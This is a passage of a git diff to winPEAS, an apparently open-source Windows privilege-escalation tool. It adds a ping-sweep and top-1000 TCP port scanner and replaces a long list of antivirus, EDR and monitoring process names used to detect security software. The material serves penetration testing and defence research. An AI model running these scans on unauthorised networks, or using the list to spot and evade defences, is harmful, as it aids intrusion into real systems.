options.Split(','); + scanMode = ScanMode.IPAddressList; + } + } + + public void Scan() + { + try + { + Beaprint.GreatPrint("Scanning network (it might take some time)..."); + + List aliveHosts = new List(); + NetPinger netPinger = new NetPinger(); + + if (scanMode == ScanMode.Auto) + { + // this is the "auto" mode + foreach (var ipAddressAndNetmask in NetworkUtils.GetInternalInterfaces()) + { + netPinger.AddRange(ipAddressAndNetmask.Item1, ipAddressAndNetmask.Item2); + } + } + if (scanMode == ScanMode.IPAddressNetmask) + { + netPinger.AddRange(baseAddress, netmask); + } + else if (scanMode == ScanMode.IPAddressList) + { + netPinger.AddRange(ipAddressList); + } + + var task = netPinger.RunPingSweepAsync(); + task.Wait(); + aliveHosts.AddRange(netPinger.HostsAlive); + + PortScanner ps = new PortScanner(this.ports); + Parallel.ForEach(aliveHosts, host => + { + ps.Start(host); + }); + } + catch (Exception e) + { + Beaprint.PrintException(e.Message); + } + } + } +} diff --git a/winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/NetworkUtils.cs b/winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/NetworkUtils.cs new file mode 100644 index 0000000..9e7757f --- /dev/null +++ b/winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/NetworkUtils.cs @@ -0,0 +1,221 @@ +using System; +using System.Collections.Generic; +using System.ComponentModel; +using System.Linq; +using System.Net; +using System.Net.NetworkInformation; + +namespace winPEAS.Info.NetworkInfo.NetworkScanner +{ + internal static class NetworkUtils + { + + /// + /// IPAddress to UInteger + /// + /// + /// + public static uint IPToUInt(this string ipAddress) + { + if (string.IsNullOrEmpty(ipAddress)) + return 0; + + if (IPAddress.TryParse(ipAddress, out IPAddress ip)) + { + var bytes = ip.GetAddressBytes(); + Array.Reverse(bytes); + return BitConverter.ToUInt32(bytes, 0); + } + else + return 0; + + } + + /// + /// IP in Uinteger to string + /// + /// + /// + public static string IPToString(this uint ipUInt) + { + return ToIPAddress(ipUInt).ToString(); + } + + + /// + /// IP in Uinteger to IPAddress + /// + /// + /// + public static IPAddress ToIPAddress(this uint ipUInt) + { + var bytes = BitConverter.GetBytes(ipUInt); + Array.Reverse(bytes); + return new IPAddress(bytes); + } + + /// + /// First and Last IPv4 from IP + Mask + /// + /// + /// Accepts CIDR or IP. Example 255.255.255.0 or 24 + /// Removes not usable IPs from Range + /// + /// + /// If ´filterUsable=false´ first IP is not usable and last is reserved for broadcast. + /// + public static string[] GetIpRange(string ipv4, string mask, bool filterUsable) + { + uint[] uiIpRange = GetIpUintRange(ipv4, mask, filterUsable); + + return Array.ConvertAll(uiIpRange, x => IPToString(x)); + } + + /// + /// First and Last IPv4 + Mask. + /// + /// + /// Accepts CIDR or IP. Example 255.255.255.0 or 24 + /// Removes not usable IPs from Range + /// + /// + /// First IP is not usable and last is reserverd for broadcast. + /// Can use all IPs in between + /// + public static uint[] GetIpUintRange(string ipv4, string mask, bool filterUsable) + { + uint sub; + //check if mask is CIDR Notation + if (mask.Contains(".")) + { + sub = IPToUInt(mask); + } + else + { + sub = ~(0xffffffff >> Convert.ToInt32(mask)); + } + + uint ip2 = IPToUInt(ipv4); + + + uint first = ip2 & sub; + uint last = first | (0xffffffff & ~sub); + + if (filterUsable) + { + first += 1; + last -= 1; + } + + return new uint[] { first, last }; + } + + public static IEnumerable GetIPRange(IPAddress startIP, IPAddress endIP) + { + uint sIP = ipToUint(startIP.GetAddressBytes()); + uint eIP = ipToUint(endIP.GetAddressBytes()); + while (sIP <= eIP) + { + yield return new IPAddress(reverseBytesArray(sIP)).ToString(); + sIP++; + } + } + + public static string CidrToNetmask(int cidr) + { + var nmask = 0xFFFFFFFF; + nmask <<= 32 - cidr; + byte[] bytes = BitConverter.GetBytes(nmask); + Array.Reverse(bytes); + nmask = BitConverter.ToUInt32(bytes, 0); + var netmask = new System.Net.IPAddress(nmask); + return netmask.ToString(); + } + + public static IEnumerable GetIPAddressesByNetmask(string ipAddress, string netmask) + { + // TODO + // e.g. + // netmask should be e.g. 24 - currently we only support this format + string[] range = NetworkUtils.GetIpRange(ipAddress, netmask, false); + + return range; + } + + public static IEnumerable GetHostsByIPAndNetmask(string ipAddressAndNetmask) + { + // TODO + // get hosts by ip address & netmask + + // https://itecnote.com/tecnote/c-proper-way-to-scan-a-range-of-ip-addresses/ + // we nned to (maybe in parallel) + // - ping e.g. 3 times + // - scan top 5 ports + var parts = ipAddressAndNetmask.Split(':'); + + return new List + { + parts[0] + }; + } + + public static List> GetInternalInterfaces() + { + List> result = new List>(); + + foreach (NetworkInterface ni in NetworkInterface.GetAllNetworkInterfaces()) + { + if (ni.OperationalStatus == OperationalStatus.Up && + (ni.NetworkInterfaceType == NetworkInterfaceType.Wireless80211 || ni.NetworkInterfaceType == NetworkInterfaceType.Ethernet)) + { + // Console.WriteLine(); + foreach (UnicastIPAddressInformation ip in ni.GetIPProperties().UnicastAddresses) + { + if (ip.Address.AddressFamily == System.Net.Sockets.AddressFamily.InterNetwork) + { + // we need ip address and a netmask as well + result.Add(new Tuple(ip.Address.ToString(), ip.IPv4Mask.ToString())); + } + } + } + } + + return result; + } + + /* Convert bytes array to 32 bit long value */ + static uint ipToUint(byte[] ipBytes) + { + ByteConverter bConvert = new ByteConverter(); + uint ipUint = 0; + + int shift = 24; // indicates number of bits left for shifting + foreach (byte b in ipBytes) + { + if (ipUint == 0) + { + ipUint = (uint)bConvert.ConvertTo(b, typeof(uint)) << shift; + shift -= 8; + continue; + } + + if (shift >= 8) + ipUint += (uint)bConvert.ConvertTo(b, typeof(uint)) << shift; + else + ipUint += (uint)bConvert.ConvertTo(b, typeof(uint)); + + shift -= 8; + } + + return ipUint; + } + + /* reverse byte order in array */ + private static uint reverseBytesArray(uint ip) + { + byte[] bytes = BitConverter.GetBytes(ip); + bytes = bytes.Reverse().ToArray(); + return (uint)BitConverter.ToInt32(bytes, 0); + } + } +} diff --git a/winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/PortScanner.cs b/winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/PortScanner.cs new file mode 100644 index 0000000..ca8b229 --- /dev/null +++ b/winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/PortScanner.cs @@ -0,0 +1,122 @@ +using System; +using System.Collections.Generic; +using System.Net.Sockets; +using System.Threading; +using System.Threading.Tasks; + +namespace winPEAS.Info.NetworkInfo.NetworkScanner +{ + class PortScanner + { + private int TcpTimeout = 500; // ms + + #region nmap tcp top 1000 + + static List nmapTop1000TCPPorts = new List + { + 1,3,4,6,7,9,13,17,19,20,21,22,23,24,25,26,30,32,33,37,42,43,49,53,70,79,80,81,82,83,84,85,88,89,90,99,100,106,109,110,111,113,119,125,135,139,143,144,146,161,163, + 179,199,211,212,222,254,255,256,259,264,280,301,306,311,340,366,389,406,407,416,417,425,427,443,444,445,458,464,465,481,497,500,512,513,514,515,524,541,543,544,545, + 548,554,555,563,587,593,616,617,625,631,636,646,648,666,667,668,683,687,691,700,705,711,714,720,722,726,749,765,777,783,787,800,801,808,843,873,880,888,898,900,901, + 902,903,911,912,981,987,990,992,993,995,999,1000,1001,1002,1007,1009,1010,1011,1021,1022,1023,1024,1025,1026,1027,1028,1029,1030,1031,1032,1033,1034,1035,1036,1037, + 1038,1039,1040,1041,1042,1043,1044,1045,1046,1047,1048,1049,1050,1051,1052,1053,1054,1055,1056,1057,1058,1059,1060,1061,1062,1063,1064,1065,1066,1067,1068,1069,1070, + 1071,1072,1073,1074,1075,1076,1077,1078,1079,1080,1081,1082,1083,1084,1085,1086,1087,1088,1089,1090,1091,1092,1093,1094,1095,1096,1097,1098,1099,1100,1102,1104,1105, + 1106,1107,1108,1110,1111,1112,1113,1114,1117,1119,1121,1122,1123,1124,1126,1130,1131,1132,1137,1138,1141,1145,1147,1148,1149,1151,1152,1154,1163,1164,1165,1166,1169, + 1174,1175,1183,1185,1186,1187,1192,1198,1199,1201,1213,1216,1217,1218,1233,1234,1236,1244,1247,1248,1259,1271,1272,1277,1287,1296,1300,1301,1309,1310,1311,1322,1328, + 1334,1352,1417,1433,1434,1443,1455,1461,1494,1500,1501,1503,1521,1524,1533,1556,1580,1583,1594,1600,1641,1658,1666,1687,1688,1700,1717,1718,1719,1720,1721,1723,1755, + 1761,1782,1783,1801,1805,1812,1839,1840,1862,1863,1864,1875,1900,1914,1935,1947,1971,1972,1974,1984,1998,1999,2000,2001,2002,2003,2004,2005,2006,2007,2008,2009,2010, + 2013,2020,2021,2022,2030,2033,2034,2035,2038,2040,2041,2042,2043,2045,2046,2047,2048,2049,2065,2068,2099,2100,2103,2105,2106,2107,2111,2119,2121,2126,2135,2144,2160, + 2161,2170,2179,2190,2191,2196,2200,2222,2251,2260,2288,2301,2323,2366,2381,2382,2383,2393,2394,2399,2401,2492,2500,2522,2525,2557,2601,2602,2604,2605,2607,2608,2638, + 2701,2702,2710,2717,2718,2725,2800,2809,2811,2869,2875,2909,2910,2920,2967,2968,2998,3000,3001,3003,3005,3006,3007,3011,3013,3017,3030,3031,3052,3071,3077,3128,3168, + 3211,3221,3260,3261,3268,3269,3283,3300,3301,3306,3322,3323,3324,3325,3333,3351,3367,3369,3370,3371,3372,3389,3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689, + 3690,3703,3737,3766,3784,3800,3801,3809,3814,3826,3827,3828,3851,3869,3871,3878,3880,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000,4001,4002,4003,4004,4005, + 4006,4045,4111,4125,4126,4129,4224,4242,4279,4321,4343,4443,4444,4445,4446,4449,4550,4567,4662,4848,4899,4900,4998,5000,5001,5002,5003,5004,5009,5030,5033,5050,5051, + 5054,5060,5061,5080,5087,5100,5101,5102,5120,5190,5200,5214,5221,5222,5225,5226,5269,5280,5298,5357,5405,5414,5431,5432,5440,5500,5510,5544,5550,5555,5560,5566,5631, + 5633,5666,5678,5679,5718,5730,5800,5801,5802,5810,5811,5815,5822,5825,5850,5859,5862,5877,5900,5901,5902,5903,5904,5906,5907,5910,5911,5915,5922,5925,5950,5952,5959, + 5960,5961,5962,5963,5987,5988,5989,5998,5999,6000,6001,6002,6003,6004,6005,6006,6007,6009,6025,6059,6100,6101,6106,6112,6123,6129,6156,6346,6389,6502,6510,6543,6547, + 6565,6566,6567,6580,6646,6666,6667,6668,6669,6689,6692,6699,6779,6788,6789,6792,6839,6881,6901,6969,7000,7001,7002,7004,7007,7019,7025,7070,7100,7103,7106,7200,7201, + 7402,7435,7443,7496,7512,7625,7627,7676,7741,7777,7778,7800,7911,7920,7921,7937,7938,7999,8000,8001,8002,8007,8008,8009,8010,8011,8021,8022,8031,8042,8045,8080,8081, + 8082,8083,8084,8085,8086,8087,8088,8089,8090,8093,8099,8100,8180,8181,8192,8193,8194,8200,8222,8254,8290,8291,8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651, + 8652,8654,8701,8800,8873,8888,8899,8994,9000,9001,9002,9003,9009,9010,9011,9040,9050,9071,9080,9081,9090,9091,9099,9100,9101,9102,9103,9110,9111,9200,9207,9220,9290, + 9415,9418,9485,9500,9502,9503,9535,9575,9593,9594,9595,9618,9666,9876,9877,9878,9898,9900,9917,9929,9943,9944,9968,9998,9999,10000,10001,10002,10003,10004,10009,10010, + 10012,10024,10025,10082,10180,10215,10243,10566,10616,10617,10621,10626,10628,10629,10778,11110,11111,11967,12000,12174,12265,12345,13456,13722,13782,13783,14000,14238, + 14441,14442,15000,15002,15003,15004,15660,15742,16000,16001,16012,16016,16018,16080,16113,16992,16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801, + 19842,20000,20005,20031,20221,20222,20828,21571,22939,23502,24444,24800,25734,25735,26214,27000,27352,27353,27355,27356,27715,28201,30000,30718,30951,31038,31337,32768, + 32769,32770,32771,32772,32773,32774,32775,32776,32777,32778,32779,32780,32781,32782,32783,32784,32785,33354,33899,34571,34572,34573,35500,38292,40193,40911,41511,42510, + 44176,44442,44443,44501,45100,48080,49152,49153,49154,49155,49156,49157,49158,49159,49160,49161,49163,49165,49167,49175,49176,49400,49999,50000,50001,50002,50003,50006, + 50300,50389,50500,50636,50800,51103,51493,52673,52822,52848,52869,54045,54328,55055,55056,55555,55600,56737,56738,57294,57797,58080,60020,60443,61532,61900,62078,63331, + 64623,64680,65000,65129,65389 + }; + + #endregion + + private struct TcpPortState + { + public TcpClient MainClient { get; set; } + public bool IsTcpPortOpen { get; set; } + } + + IEnumerable portsToScan = nmapTop1000TCPPorts; + + public PortScanner(IEnumerable ports) + { + if (ports != null) + { + portsToScan = ports; + } + } + + public void Start(string host) + { + Parallel.ForEach(portsToScan, port => + { + RunScanTcp(host, port); + }); + } + + public void RunScanTcp(string host, int port) + { + Thread.Sleep(1); + + var newClient = new TcpClient(); + + var state = new TcpPortState + { + MainClient = newClient, + IsTcpPortOpen = true + }; + + IAsyncResult ar = newClient.BeginConnect(host, port, AsyncCallback, state); + state.IsTcpPortOpen = ar.AsyncWaitHandle.WaitOne(TcpTimeout, false); + + if (state.IsTcpPortOpen == false || newClient.Connected == false) + { + return; + } + + Console.WriteLine("[+] Open TCP port at: {0}:{1}", host, port); + } + + + void AsyncCallback(IAsyncResult asyncResult) + { + var state = (TcpPortState)asyncResult.AsyncState; + TcpClient client = state.MainClient; + + try + { + client.EndConnect(asyncResult); + } + catch + { + return; + } + + if (client.Connected && state.IsTcpPortOpen) + { + return; + } + + client.Close(); + } + } +} diff --git a/winPEAS/winPEASexe/winPEAS/Info/ProcessInfo/DefensiveProcesses.cs b/winPEAS/winPEASexe/winPEAS/Info/ProcessInfo/DefensiveProcesses.cs index c656c0c..6873d4b 100644 --- a/winPEAS/winPEASexe/winPEAS/Info/ProcessInfo/DefensiveProcesses.cs +++ b/winPEAS/winPEASexe/winPEAS/Info/ProcessInfo/DefensiveProcesses.cs @@ -4,664 +4,103 @@ namespace winPEAS.Info.ProcessInfo { static class DefensiveProcesses { - public static Dictionary Definitions = new Dictionary() + private static Dictionary> Definitions = new Dictionary>() { - {"mcshield.exe" , "McAfee AV"}, - {"windefend.exe" , "Windows Defender AV"}, - {"MSASCui.exe" , "Windows Defender AV"}, - {"MSASCuiL.exe" , "Windows Defender AV"}, - {"msmpeng.exe" , "Windows Defender AV"}, - {"msmpsvc.exe" , "Windows Defender AV"}, - {"WRSA.exe" , "WebRoot AV"}, - {"savservice.exe" , "Sophos AV"}, - {"TMCCSF.exe" , "Trend Micro AV"}, - {"symantec antivirus.exe" , "Symantec AV"}, - {"mbae.exe" , "MalwareBytes Anti-Exploit"}, - {"parity.exe" , "Bit9 application whitelisting"}, - {"cb.exe" , "Carbon Black behavioral analysis"}, - {"bds-vision.exe" , "BDS Vision behavioral analysis"}, - {"Triumfant.exe" , "Triumfant behavioral analysis"}, - {"CSFalcon.exe" , "CrowdStrike Falcon EDR"}, - {"ossec.exe" , "OSSEC intrusion detection"}, - {"TmPfw.exe" , "Trend Micro firewall"}, - {"dgagent.exe" , "Verdasys Digital Guardian DLP"}, - {"kvoop.exe" , " DLP process" }, - {"AAWTray.exe" , ""}, - {"ackwin32.exe" , ""}, - {"Ad-Aware.exe" , ""}, - {"adaware.exe" , ""}, - {"advxdwin.exe" , ""}, - {"agentsvr.exe" , ""}, - {"agentw.exe" , ""}, - {"alertsvc.exe" , ""}, - {"alevir.exe" , ""}, - {"alogserv.exe" , ""}, - {"amon9x.exe" , ""}, - {"anti-trojan.exe" , ""}, - {"antivirus.exe" , ""}, - {"ants.exe" , ""}, - {"apimonitor.exe" , ""}, - {"aplica32.exe" , ""}, - {"apvxdwin.exe" , ""}, - {"arr.exe" , ""}, - {"atcon.exe" , ""}, - {"atguard.exe" , ""}, - {"atro55en.exe" , ""}, - {"atupdater.exe" , ""}, - {"atwatch.exe" , ""}, - {"au.exe" , ""}, - {"aupdate.exe" , ""}, - {"auto-protect.nav80try.exe", ""}, - {"autodown.exe" , ""}, - {"autoruns.exe" , ""}, - {"autorunsc.exe" , ""}, - {"autotrace.exe" , ""}, - {"autoupdate.exe" , ""}, - {"avconsol.exe" , ""}, - {"ave32.exe" , ""}, - {"avgcc32.exe" , ""}, - {"avgctrl.exe" , ""}, - {"avgemc.exe" , ""}, - {"avgnt.exe" , ""}, - {"avgrsx.exe" , ""}, - {"avgserv.exe" , ""}, - {"avgserv9.exe" , ""}, - {"avguard.exe" , ""}, - {"avgwdsvc.exe" , ""}, - {"avgui.exe" , ""}, - {"avgw.exe" , ""}, - {"avkpop.exe" , ""}, - {"avkserv.exe" , ""}, - {"avkservice.exe" , ""}, - {"avkwctl9.exe" , ""}, - {"avltmain.exe" , ""}, - {"avnt.exe" , ""}, - {"avp.exe" , ""}, - {"avp32.exe" , ""}, - {"avpcc.exe" , ""}, - {"avpdos32.exe" , ""}, - {"avpm.exe" , ""}, - {"avptc32.exe" , ""}, - {"avpupd.exe" , ""}, - {"avsched32.exe" , ""}, - {"avsynmgr.exe" , ""}, - {"avwin.exe" , ""}, - {"avwin95.exe" , ""}, - {"avwinnt.exe" , ""}, - {"avwupd.exe" , ""}, - {"avwupd32.exe" , ""}, - {"avwupsrv.exe" , ""}, - {"avxmonitor9x.exe" , ""}, - {"avxmonitornt.exe" , ""}, - {"avxquar.exe" , ""}, - {"backweb.exe" , ""}, - {"bargains.exe" , ""}, - {"bd_professional.exe" , ""}, - {"beagle.exe" , ""}, - {"belt.exe" , ""}, - {"bidef.exe" , ""}, - {"bidserver.exe" , ""}, - {"bipcp.exe" , ""}, - {"bipcpevalsetup.exe" , ""}, - {"bisp.exe" , ""}, - {"blackd.exe" , ""}, - {"blackice.exe" , ""}, - {"blink.exe" , ""}, - {"blss.exe" , ""}, - {"bootconf.exe" , ""}, - {"bootwarn.exe" , ""}, - {"borg2.exe" , ""}, - {"bpc.exe" , ""}, - {"brasil.exe" , ""}, - {"bs120.exe" , ""}, - {"bundle.exe" , ""}, - {"bvt.exe" , ""}, - {"ccapp.exe" , ""}, - {"ccevtmgr.exe" , ""}, - {"ccpxysvc.exe" , ""}, - {"ccSvcHst.exe" , ""}, - {"cdp.exe" , ""}, - {"cfd.exe" , ""}, - {"cfgwiz.exe" , ""}, - {"cfiadmin.exe" , ""}, - {"cfiaudit.exe" , ""}, - {"cfinet.exe" , ""}, - {"cfinet32.exe" , ""}, - {"claw95.exe" , ""}, - {"claw95cf.exe" , ""}, - {"clean.exe" , ""}, - {"cleaner.exe" , ""}, - {"cleaner3.exe" , ""}, - {"cleanpc.exe" , ""}, - {"cleanup.exe" , ""}, - {"click.exe" , ""}, - {"cmdagent.exe" , ""}, - {"cmesys.exe" , ""}, - {"cmgrdian.exe" , ""}, - {"cmon016.exe" , ""}, - {"connectionmonitor.exe" , ""}, - {"cpd.exe" , ""}, - {"cpf9x206.exe" , ""}, - {"cpfnt206.exe" , ""}, - {"ctrl.exe" , ""}, - {"cv.exe" , ""}, - {"cwnb181.exe" , ""}, - {"cwntdwmo.exe" , ""}, - {"CylanceUI.exe" , ""}, - {"CyProtect.exe" , ""}, - {"CyUpdate.exe" , ""}, - {"cyserver.exe" , ""}, - {"cytray.exe" , ""}, - {"CyveraService.exe" , ""}, - {"datemanager.exe" , ""}, - {"dcomx.exe" , ""}, - {"defalert.exe" , ""}, - {"defscangui.exe" , ""}, - {"defwatch.exe" , ""}, - {"deputy.exe" , ""}, - {"divx.exe" , ""}, - {"dgprompt.exe" , ""}, - {"DgService.exe" , ""}, - {"dllcache.exe" , ""}, - {"dllreg.exe" , ""}, - {"doors.exe" , ""}, - {"dpf.exe" , ""}, - {"dpfsetup.exe" , ""}, - {"dpps2.exe" , ""}, - {"drwatson.exe" , ""}, - {"drweb32.exe" , ""}, - {"drwebupw.exe" , ""}, - {"dssagent.exe" , ""}, - {"dumpcap.exe" , ""}, - {"dvp95.exe" , ""}, - {"dvp95_0.exe" , ""}, - {"ecengine.exe" , ""}, - {"efpeadm.exe" , ""}, - {"egui.exe" , ""}, - {"ekrn.exe" , ""}, - {"emet_agent.exe" , ""}, - {"emet_service.exe" , ""}, - {"emsw.exe" , ""}, - {"engineserver.exe" , ""}, - {"ent.exe" , ""}, - {"esafe.exe" , ""}, - {"escanhnt.exe" , ""}, - {"escanv95.exe" , ""}, - {"espwatch.exe" , ""}, - {"ethereal.exe" , ""}, - {"etrustcipe.exe" , ""}, - {"evpn.exe" , ""}, - {"exantivirus-cnet.exe" , ""}, - {"exe.avxw.exe" , ""}, - {"expert.exe" , ""}, - {"explore.exe" , ""}, - {"f-agnt95.exe" , ""}, - {"f-prot.exe" , ""}, - {"f-prot95.exe" , ""}, - {"f-stopw.exe" , ""}, - {"fameh32.exe" , ""}, - {"fast.exe" , ""}, - {"fch32.exe" , ""}, - {"fcagswd.exe" , "McAfee DLP Agent"}, - {"fcags.exe" , "McAfee DLP Agent"}, - {"fih32.exe" , ""}, - {"findviru.exe" , ""}, - {"firesvc.exe" , "McAfee Host Intrusion Prevention"}, - {"firetray.exe" , ""}, - {"firewall.exe" , ""}, - {"fnrb32.exe" , ""}, - {"fp-win.exe" , ""}, - {"fp-win_trial.exe" , ""}, - {"fprot.exe" , ""}, - {"frameworkservice.exe" , ""}, - {"frminst.exe" , ""}, - {"frw.exe" , ""}, - {"fsaa.exe" , ""}, - {"fsav.exe" , ""}, - {"fsav32.exe" , ""}, - {"fsav530stbyb.exe" , ""}, - {"fsav530wtbyb.exe" , ""}, - {"fsav95.exe" , ""}, - {"fsgk32.exe" , ""}, - {"fsm32.exe" , ""}, - {"fsma32.exe" , ""}, - {"fsmb32.exe" , ""}, - {"gator.exe" , ""}, - {"gbmenu.exe" , ""}, - {"gbpoll.exe" , ""}, - {"generics.exe" , ""}, - {"gmt.exe" , ""}, - {"guard.exe" , ""}, - {"guarddog.exe" , ""}, - {"hacktracersetup.exe" , ""}, - {"hbinst.exe" , ""}, - {"hbsrv.exe" , ""}, - {"HijackThis.exe" , ""}, - {"hipsvc.exe" , ""}, - {"HipMgmt.exe" , "McAfee Host Intrusion Protection"}, - {"hotactio.exe" , ""}, - {"hotpatch.exe" , ""}, - {"htlog.exe" , ""}, - {"htpatch.exe" , ""}, - {"hwpe.exe" , ""}, - {"hxdl.exe" , ""}, - {"hxiul.exe" , ""}, - {"iamapp.exe" , ""}, - {"iamserv.exe" , ""}, - {"iamstats.exe" , ""}, - {"ibmasn.exe" , ""}, - {"ibmavsp.exe" , ""}, - {"icload95.exe" , ""}, - {"icloadnt.exe" , ""}, - {"icmon.exe" , ""}, - {"icsupp95.exe" , ""}, - {"icsuppnt.exe" , ""}, - {"idle.exe" , ""}, - {"iedll.exe" , ""}, - {"iedriver.exe" , ""}, - {"iface.exe" , ""}, - {"ifw2000.exe" , ""}, - {"inetlnfo.exe" , ""}, - {"infus.exe" , ""}, - {"infwin.exe" , ""}, - {"init.exe" , ""}, - {"intdel.exe" , ""}, - {"intren.exe" , ""}, - {"iomon98.exe" , ""}, - {"istsvc.exe" , ""}, - {"jammer.exe" , ""}, - {"jdbgmrg.exe" , ""}, - {"jedi.exe" , ""}, - {"kavlite40eng.exe" , ""}, - {"kavpers40eng.exe" , ""}, - {"kavpf.exe" , ""}, - {"kazza.exe" , ""}, - {"keenvalue.exe" , ""}, - {"kerio-pf-213-en-win.exe" , ""}, - {"kerio-wrl-421-en-win.exe" , ""}, - {"kerio-wrp-421-en-win.exe" , ""}, - {"kernel32.exe" , ""}, - {"KeyPass.exe" , ""}, - {"killprocesssetup161.exe" , ""}, - {"launcher.exe" , ""}, - {"ldnetmon.exe" , ""}, - {"ldpro.exe" , ""}, - {"ldpromenu.exe" , ""}, - {"ldscan.exe" , ""}, - {"lnetinfo.exe" , ""}, - {"loader.exe" , ""}, - {"localnet.exe" , ""}, - {"lockdown.exe" , ""}, - {"lockdown2000.exe" , ""}, - {"lookout.exe" , ""}, - {"lordpe.exe" , ""}, - {"lsetup.exe" , ""}, - {"luall.exe" , ""}, - {"luau.exe" , ""}, - {"lucomserver.exe" , ""}, - {"luinit.exe" , ""}, - {"luspt.exe" , ""}, - {"mapisvc32.exe" , ""}, - {"masvc.exe" , "McAfee Agent"}, - {"mbamservice.exe" , ""}, - {"mcafeefire.exe" , ""}, - {"mcagent.exe" , ""}, - {"mcmnhdlr.exe" , ""}, - {"mcscript.exe" , ""}, - {"mcscript_inuse.exe" , ""}, - {"mctool.exe" , ""}, - {"mctray.exe" , ""}, - {"mcupdate.exe" , ""}, - {"mcvsrte.exe" , ""}, - {"mcvsshld.exe" , ""}, - {"md.exe" , ""}, - {"mfeann.exe" , "McAfee VirusScan Enterprise"}, - {"mfemactl.exe" , "McAfee VirusScan Enterprise"}, - {"mfevtps.exe" , ""}, - {"mfin32.exe" , ""}, - {"mfw2en.exe" , ""}, - {"mfweng3.02d30.exe" , ""}, - {"mgavrtcl.exe" , ""}, - {"mgavrte.exe" , ""}, - {"mghtml.exe" , ""}, - {"mgui.exe" , ""}, - {"minilog.exe" , ""}, - {"minionhost.exe" , ""}, - {"mmod.exe" , ""}, - {"monitor.exe" , ""}, - {"moolive.exe" , ""}, - {"mostat.exe" , ""}, - {"mpfagent.exe" , ""}, - {"mpfservice.exe" , ""}, - {"mpftray.exe" , ""}, - {"mrflux.exe" , ""}, - {"msapp.exe" , ""}, - {"msbb.exe" , ""}, - {"msblast.exe" , ""}, - {"mscache.exe" , ""}, - {"msccn32.exe" , ""}, - {"mscman.exe" , ""}, - {"msconfig.exe" , ""}, - {"msdm.exe" , ""}, - {"msdos.exe" , ""}, - {"msiexec16.exe" , ""}, - {"msinfo32.exe" , ""}, - {"mslaugh.exe" , ""}, - {"msmgt.exe" , ""}, - {"msmsgri32.exe" , ""}, - {"MsSense.exe" , "Microsoft Defender ATP"}, - {"mssmmc32.exe" , ""}, - {"mssys.exe" , ""}, - {"msvxd.exe" , ""}, - {"mu0311ad.exe" , ""}, - {"mwatch.exe" , ""}, - {"n32scanw.exe" , ""}, - {"naprdmgr.exe" , ""}, - {"nav.exe" , ""}, - {"navap.navapsvc.exe" , ""}, - {"navapsvc.exe" , ""}, - {"navapw32.exe" , ""}, - {"navdx.exe" , ""}, - {"navlu32.exe" , ""}, - {"navnt.exe" , ""}, - {"navstub.exe" , ""}, - {"navw32.exe" , ""}, - {"navwnt.exe" , ""}, - {"nc2000.exe" , ""}, - {"ncinst4.exe" , ""}, - {"ndd32.exe" , ""}, - {"neomonitor.exe" , ""}, - {"neowatchlog.exe" , ""}, - {"netarmor.exe" , ""}, - {"netd32.exe" , ""}, - {"netinfo.exe" , ""}, - {"netmon.exe" , ""}, - {"netscanpro.exe" , ""}, - {"netspyhunter-1.2.exe" , ""}, - {"netstat.exe" , ""}, - {"netutils.exe" , ""}, - {"nisserv.exe" , ""}, - {"nisum.exe" , ""}, - {"nmain.exe" , ""}, - {"nod32.exe" , ""}, - {"normist.exe" , ""}, - {"norton_internet_secu_3.0_407.exe" , ""}, - {"notstart.exe" , ""}, - {"npf40_tw_98_nt_me_2k.exe" , ""}, - {"npfmessenger.exe" , ""}, - {"nprotect.exe" , ""}, - {"npscheck.exe" , ""}, - {"npssvc.exe" , ""}, - {"nsched32.exe" , ""}, - {"nssys32.exe" , ""}, - {"nstask32.exe" , ""}, - {"nsupdate.exe" , ""}, - {"nt.exe" , ""}, - {"ntrtscan.exe" , ""}, - {"ntvdm.exe" , ""}, - {"ntxconfig.exe" , ""}, - {"nui.exe" , ""}, - {"nupgrade.exe" , ""}, - {"nvarch16.exe" , ""}, - {"nvc95.exe" , ""}, - {"nvsvc32.exe" , ""}, - {"nwinst4.exe" , ""}, - {"nwservice.exe" , ""}, - {"nwtool16.exe" , ""}, - {"nxlog.exe" , ""}, - {"ollydbg.exe" , ""}, - {"onsrvr.exe" , ""}, - {"optimize.exe" , ""}, - {"ostronet.exe" , ""}, - {"osqueryd.exe" , ""}, - {"otfix.exe" , ""}, - {"outpost.exe" , ""}, - {"outpostinstall.exe" , ""}, - {"outpostproinstall.exe" , ""}, - {"padmin.exe" , ""}, - {"panixk.exe" , ""}, - {"patch.exe" , ""}, - {"pavcl.exe" , ""}, - {"pavproxy.exe" , ""}, - {"pavsched.exe" , ""}, - {"pavw.exe" , ""}, - {"pccwin98.exe" , ""}, - {"pcfwallicon.exe" , ""}, - {"pcip10117_0.exe" , ""}, - {"pcscan.exe" , ""}, - {"pdsetup.exe" , ""}, - {"periscope.exe" , ""}, - {"persfw.exe" , ""}, - {"perswf.exe" , ""}, - {"pf2.exe" , ""}, - {"pfwadmin.exe" , ""}, - {"pgmonitr.exe" , ""}, - {"pingscan.exe" , ""}, - {"platin.exe" , ""}, - {"pop3trap.exe" , ""}, - {"poproxy.exe" , ""}, - {"popscan.exe" , ""}, - {"portdetective.exe" , ""}, - {"portmonitor.exe" , ""}, - {"powerscan.exe" , ""}, - {"ppinupdt.exe" , ""}, - {"pptbc.exe" , ""}, - {"ppvstop.exe" , ""}, - {"prizesurfer.exe" , ""}, - {"prmt.exe" , ""}, - {"prmvr.exe" , ""}, - {"procdump.exe" , ""}, - {"processmonitor.exe" , ""}, - {"procexp.exe" , ""}, - {"procexp64.exe" , ""}, - {"procexplorerv1.0.exe" , ""}, - {"procmon.exe" , ""}, - {"programauditor.exe" , ""}, - {"proport.exe" , ""}, - {"protectx.exe" , ""}, - {"pspf.exe" , ""}, - {"purge.exe" , ""}, - {"qconsole.exe" , ""}, - {"qserver.exe" , ""}, - {"rapapp.exe" , ""}, - {"rav7.exe" , ""}, - {"rav7win.exe" , ""}, - {"rav8win32eng.exe" , ""}, - {"ray.exe" , ""}, - {"rb32.exe" , ""}, - {"rcsync.exe" , ""}, - {"realmon.exe" , ""}, - {"reged.exe" , ""}, - {"regedit.exe" , 